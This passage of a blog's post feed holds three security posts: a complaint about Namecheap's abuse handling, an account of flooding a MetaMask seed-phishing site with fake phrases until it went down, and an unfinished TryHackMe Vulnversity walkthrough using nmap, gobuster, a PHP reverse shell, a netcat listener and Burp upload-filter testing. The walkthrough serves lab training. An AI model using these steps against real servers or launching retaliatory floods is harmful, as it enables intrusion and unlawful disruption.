#3598db;\"><a href=\"https://www.icann.org/resources/pages/what-2012-02-25-en\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">ICANN</a></span> is a not-for-profit partnership of people from all over the world dedicated to keeping the Internet secure, stable and inter-operable. </p>\n<p><strong><em>To reach another person on the Internet you have to type an address into your computer - a name or a number. That address has to be unique so computers know where to find each other. <abbr title=\"Internet Corporation for Assigned Names and Numbers\">ICANN</abbr> coordinates these unique identifiers across the world. Without that coordination we wouldn't have one global Internet.</em></strong></p>\n<p>Back to Namecheap. The guys that govern THE INTERNET state that a registrar should deal with phishing and malware associated with domains they registered but Namecheap thinks different. Their policy states:</p>\n<p> </p>\n<div><strong><em>Some types of abuse may not be verified from our side if we only act as a registrar and the abusive content resides on third-party servers. Due to this, we will not take restrictive action in order to avoid false-positive cases. This policy particularly affects copyright/DMCA, email abuse/spam, fraud, malware/hacking activity, etc.</em></strong></div>\n<div> </div>\n<div><strong><em>To expedite the resolution, we highly recommended escalating websites that are registered with Namecheap only to their respective hosting provider supporting your report with sufficient evidence. You might also decide to get in touch with the domain name holder directly by using the Whois details that are assigned to that domain name. If the Whois details are hidden by our </em></strong><em><a href=\"https://www.namecheap.com/security/domain-privacy/\">Domain Privacy protection</a></em><strong><em> service, feel free to send your email to the <a href=\"https://www.namecheap.com/support/knowledgebase/article.aspx/344/37/how-does-domain-privacy-work/\">protected email address</a>. It will then be forwarded to the real email address of the domain holder.</em></strong></div>\n<p> </p>\n<p>Basically they are saying as long as they're the registrar only, not providing the hosting service, they are not to be bothered with reports of phishing or malware or whatever else. They go on to say suggest that we talk to THE OWNER OF THE PHISHING DOMAIN and perhaps <span style=\"color: #3598db;\"><a href=\"https://blog.syncpundit.io/metamask-phishing-site/\" style=\"color: #3598db;\">ask them nicely to stop</a></span>. </p>\n<p>This is Namecheap's ultimate defense.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/gaara.gif\" alt=\"gaara's ultimate defense\" width=\"711\" height=\"534\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>With this shield they can hide away from taking responsibility for all sorts of nefarious actors using their services. </p>\n<p> </p>\n<h2>WHAT ABOUT NAMECHEAP HOSTING?</h2>\n<p>NO! They do not care either. Whenever you submit a phishing site to them, either using their abuse email or twitter you are told to submit a ticket! </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/NameCheapTicket.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-2xl.png 1600w\" alt=\"NameCheap Support Ticket\" width=\"788\" height=\"875\" data-is-external-image=\"true\"></figure>\n<figcaption>Namecheap Support Ticket</figcaption>\n</figure>\n<p> </p>\n<p>In addition to domain(s), url(s) and targeted website(s), you are REQUIRED to provide a detailed report along with attached files! You have to WORK to send a report to Namecheap. Not only that, they RELY on us find and report malicious activity on their infrastructure - so they can properly turn a blind eye to them.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/NameCheapTweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-2xl.png 1600w\" alt=\"NameCheap SUS Tweet\" width=\"596\" height=\"720\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>Some one responded to this tweet with some domains and this is the response they got:</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/namecheapTweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-2xl.png 1600w\" alt=\"NameCheap Tweet Response\" width=\"602\" height=\"561\" data-is-external-image=\"true\"></figure></figure>\n<p>Yes! We are to open a ticket that will never be resolved! Like this one user:</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/namecheaptweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-2xl.png 1600w\" alt=\"NameCheap Does Not Respond to Tickets\" width=\"598\" height=\"538\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>Its clear that Namecheap has no intention of taking down phishing sites. They seem to have intentionally made the process of reporting difficult. </p>\n<p> </p>\n<h2>HOW FAR DOES THIS GO?</h2>\n<p>The National Cyber Security Centre (NCSC) <a href=\"https://www.ncsc.gov.uk/files/Active-Cyber-Defence-ACD-The-Fourth-Year.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">named Namecheap the most popular </span></a>host of UK government phishing sites in 2020 with a staggering 60%! </p>\n<p>In 2018 they <a href=\"https://www.theregister.com/2018/02/07/namecheap_subdomain_security_hole/\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">let malicious actors set up all manor of phishing sites</span></a>, malware delivery, command and control subdomains on other customers' websites.</p>\n<p>Just last year <span style=\"color: #3598db;\"><a href=\"https://www.zdnet.com/article/facebook-sues-namecheap-to-unmask-hackers-who-registered-malicious-domains/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Facebook sued Namecheap</a></span> for refusing to cooperate in an investigation into a series of phishing domains registered through Namecheap. These domains were clearly set up by the same actors but Namecheap would neither take them down nor reveal any information about the threat actors.</p>\n<p>Search \"Namecheap phishing sites\" to witness how ugly Namecheap's gotten over the years.</p>\n<p> </p>\n<h2>KEY TAKEAWAYS</h2>\n<ul>\n<li>Namecheap SUCKS!!!</li>\n</ul>",
"image": "https://blog.syncpundit.io/media/posts/5/namecheap.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Phishing"
],
"date_published": "2021-08-09T23:52:00+02:00",
"date_modified": "2021-09-20T20:14:15+02:00"
},
{
"id": "https://blog.syncpundit.io/metamask-phisher-plays-the-victim/",
"url": "https://blog.syncpundit.io/metamask-phisher-plays-the-victim/",
"title": "METAMASK PHISHER PLAYS THE VICTIM",
"summary": "A few days back i was having a fun conversation with Milan and Flavio and a phishing kit came up. Typical MetaMask phish kit, nothing particularly interesting…",
"content_html": "<div class=\"post__inner post__entry\">\n<p>A few days back i was having a fun conversation with <span style=\"color: #3598db;\"><a href=\"https://twitter.com/milannshrestga\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Milan</a></span> and <span style=\"color: #3598db;\"><a href=\"https://twitter.com/tr3sor_\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Flavio</a></span> and a phishing kit came up. </p>\n<blockquote>hxxps://www [.] back-metamask [.] com/register-login.html</blockquote>\n<h2> </h2>\n<h2 class=\"align-left\">THE PHISHING KIT</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-landing-page-2.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-2xl.png 1600w\" alt=\"MetaMask Phish Landing Page\" width=\"873\" height=\"516\" data-is-external-image=\"true\"></figure></figure>\n<p>Typical MetaMask phish kit, nothing particularly interesting about it at face value, but i couldn't help a feeling deja vu. I started snooping around. I chose import wallet. Again, nothing particular, typical seed phrase harvesting page.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-wallet-page.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-2xl.png 1600w\" alt=\"MetaMask Phish Kit seed harvester page\" width=\"553\" height=\"699\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>I used <span style=\"color: #3598db;\"><a href=\"https://iancoleman.io/bip39/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Ian Coleman</a></span>'s Mnemonic Code Converter to generate a random mnemonic phrase and \"imported\" my wallet. To my surprise..</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-weird-wallet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-2xl.png 1600w\" alt=\"MetaMask Phish Kit Fake Wallet\" width=\"1087\" height=\"713\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>They gave me a whole wallet with all of 0 ETH 🤣. I'm still questioning this decision. From a design perspective, having a potential victim land on a page with NONE of their supposed ETH in their wallet is sure to cause them to panic. </p>\n<p>Anyways, going through all the requests i saw that they were sending the harvested seeds through to</p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/api.php</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-POST.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-2xl.png 1600w\" alt=\"MetaMask Phish Kit POST request\" width=\"782\" height=\"256\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>I also realised that the POST wouldn't work if the referer wasn't </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/wallet.html</p>\n</blockquote>\n<p>WIth all this info i wondered what if someone where to send a bunch of random mnemonic phrases? Even better, send LOADS of them at once... And \"someone\" did😅</p>\n<p> </p>\n<h2>DENIAL OF SERVICE</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-dos.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-2xl.png 1600w\" alt=\"MetaMask Phish Kit DOS\" width=\"1050\" height=\"949\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>And the site went down.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-server-down.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-2xl.png 1600w\" alt=\"MetaMask Phish Kit down\" width=\"1078\" height=\"848\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>It went down for some hours. it came back to life with a \"new\" script to collect the seeds. It was changed from</p>\n<p> </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/api.php</p>\n</blockquote>\n<p>to</p>\n<p> </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/apis.php</p>\n</blockquote>\n<p>A game of \"slightly alter the name of the script\" ensued. The phishers change the name of the script and the \"someone\" changes it as well. The phishing site had an average uptime of 5 minutes per hour. </p>\n<h2> </h2>\n<h2>TALKING TO THE PHISHERS</h2>\n<p>The phishers finally gave up and put up a text as their landing page. It read</p>\n<blockquote>\n<p><em>\"U ARE SO BAD telegram @ethpadpresaleadmin contact me\"</em></p>\n</blockquote>\n<p>Of course i reached out! This is how the conversation went</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-phishers-convo.jpg\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-xs.jpg 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-sm.jpg 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-md.jpg 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-lg.jpg 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-xl.jpg 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-2xl.jpg 1600w\" alt=\"MetaMask Phishers conversation\" width=\"1080\" height=\"2069\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>\"Flap Jack\" asks '..Why are u doing this?' like they are the victim 🤣🤣🤣. Staying up all night for this paid off. Another one bites the dust!</p>\n<p> </p>\n<h2>PREVIOUS ATTACKS</h2>\n<p>I scanned the domain on <span style=\"color: #3598db;\"><a href=\"https://www.virustotal.com/gui/domain/back-metamask.com\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Virus Total</a></span> and <span style=\"color: #3598db;\"><a href=\"https://urlscan.io/result/8bde9120-54b6-4d56-a2e2-76b55635ee73/related/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">URLScan</a></span> and you wouldn't believe it!</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-urlscan-similar.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-2xl.png 1600w\" alt=\"MetaMask Phish Kit on URLScan\" width=\"1452\" height=\"537\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>This is why i felt deja vu! I'd seen this before</p>\n<blockquote>\n<p><span class=\"text-muted\">hxxps://</span><span class=\"text-success bold\">restore-metamask [.] com</span>/register-login.html</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-related-on-phishfort.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-2xl.png 1600w\" alt=\"MetaMask Phish Kit on Phishfort\" width=\"957\" height=\"523\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<h2>KEY TAKEAWAYS</h2>\n<ul>\n<li>DON'T EVER SHARE YOUR SECRET SEED PHRASE </li>\n<li>NEVER FOLLOW A LINK TO A FINANCIAL PLATFORM FROM A SOCIAL MEDIA PLATFORM - ALWAYS TYPE IT MANUALLY OR BOOKMARK IT</li>\n<li><a href=\"https://www.phishfort.com/blog/staying-safe-online\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">LEARN WAYS OF STAYING SAFE ONLINE</span></a></li>\n<li>INSTALL <span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/protect\" style=\"color: #3598db;\">PHISHFORT PROTECT</a></span> </li>\n<li><span style=\"color: #3598db;\"><a href=\"https://t.me/ethpadpresaleadmin\" style=\"color: #3598db;\">https://t.me/ethpadpresaleadmin</a></span> (Flap Jack) IS A SCAMMER. REPORT THEIR ACCOUNT</li>\n</ul>\n</div>",
"image": "https://blog.syncpundit.io/media/posts/4/metamask-landing-page.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Phishing"
],
"date_published": "2021-08-04T19:36:00+02:00",
"date_modified": "2021-09-20T19:59:22+02:00"
},
{
"id": "https://blog.syncpundit.io/tryhackme-vulnversity-walkthrough/",
"url": "https://blog.syncpundit.io/tryhackme-vulnversity-walkthrough/",
"title": "TRYHACKME: VULNVERSITY WALKTHROUGH",
"summary": "With the machine spun up and ready, let's get into it! We are looking open ports. My favorite and go-to tool for this…",
"content_html": "<header class=\"major\">\n<figure class=\"is-loaded\"><img loading=\"lazy\" style=\"text-align: center; color: var(--text-editor-body-color); font-family: var(--font-base); font-size: inherit; font-weight: var(--font-weight-normal);\" src=\"https://blog.syncpundit.io/media/posts/3/lets-go.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/lets-go-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-2xl.png 1600w\" alt=\"Machine Information\" width=\"1209\" height=\"464\" data-is-external-image=\"true\"></figure>\n</header>\n<div class=\"post__inner post__entry\">\n<p>With the machine spun up and ready, let's get into it!</p>\n<h2>RECONNAISSANCE</h2>\n<p>We are looking open ports. My favorite and go-to tool for this is NMAP. We'll scan using</p>\n<blockquote>\n<p>nmap -Pn -sS -sV -T4 10.10.238.250</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/nmap-out-2.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-2xl.png 1600w\" alt=\"Nmap Output\" width=\"1141\" height=\"390\" data-is-external-image=\"true\"></figure></figure>\n<p>There's an \"Apache Server\" running on port 3333. Opening 10.10.238.250:3333 in the browser takes us to a web application.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/vulversity.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/vulversity-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-2xl.png 1600w\" alt=\"Vulnversity\" width=\"1156\" height=\"827\" data-is-external-image=\"true\"></figure></figure>\n<p>We'll look for directories and input fields, more-so uploads, for reverse shells of course! I'll be using gobuster for the job.</p>\n<blockquote>\n<p>gobuster dir -t 10 --wildcard -e -r --url http://10.10.238.250:3333/ -w dirs.txt -a \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\"</p>\n</blockquote>\n<p>We found an interesting directory \"/internal/\"</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/gobuster.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/gobuster-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-2xl.png 1600w\" alt=\"gobuster output\" width=\"891\" height=\"348\" data-is-external-image=\"true\"></figure></figure>\n<p>Opening it leads us to... wait for it ......</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/upload.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/upload-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/upload-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/upload-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/upload-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/upload-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/upload-2xl.png 1600w\" alt=\"\" width=\"598\" height=\"360\" data-is-external-image=\"true\"></figure></figure>\nAn upload 😌. For this one we'll go with a php reverse shell. i'll go ahead and grab it from\n<p> </p>\n<blockquote>\n<p>/usr/share/webshells/php/php-reverse-shell.php</p>\n</blockquote>\n<p>After this we edit the IP and port and set them to our attack machine and a free port. </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/php-rev-shell.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-2xl.png 1600w\" alt=\"\" width=\"642\" height=\"306\" data-is-external-image=\"true\"></figure></figure>\n<p>Now we start a NetCat listener on port 6996 with</p>\n<blockquote>\n<p>nc -lnvp 6996</p>\n</blockquote>\n<p>A lot of uploads either filter out or expect specific filetypes so we'd have to make a bunch of copies of the reverse shell and rename each with a different extension, to test which ones work. I'm lazy, so I'll use BurpSuite instead. I'll use</p>\n<blockquote>\n<p>http://10.10.238.250:3333/internal/</p>\n</blockquote>\n<p>as the scope.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/scope.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/scope-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/scope-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/scope-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/scope-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/scope-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/scope-2xl.png 1600w\" alt=\"scope\" width=\"614\" height=\"198\" data-is-external-image=\"true\"></figure></figure>\nWe'll use the intruder to test the file types. Leave interceptor on and open the inbuilt browser. Paste the url and load the page. Go back and turn the interceptor off. Try to upload the reverse shell. \n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/upload-rejected.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-2xl.png 1600w\" alt=\"upload rejected\" width=\"574\" height=\"323\" data-is-external-image=\"true\"></figure></figure>\nHead over to the HTTP history and find the POST request.\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/http-history.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/http-history-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-2xl.png 1600w\" alt=\"http history\" width=\"706\" height=\"321\" data-is-external-image=\"true\"></figure></figure>\nSend it to the intruder with CTRL+i. Clear the selected positions.\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/clear.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/clear-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/clear-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/clear-md.png 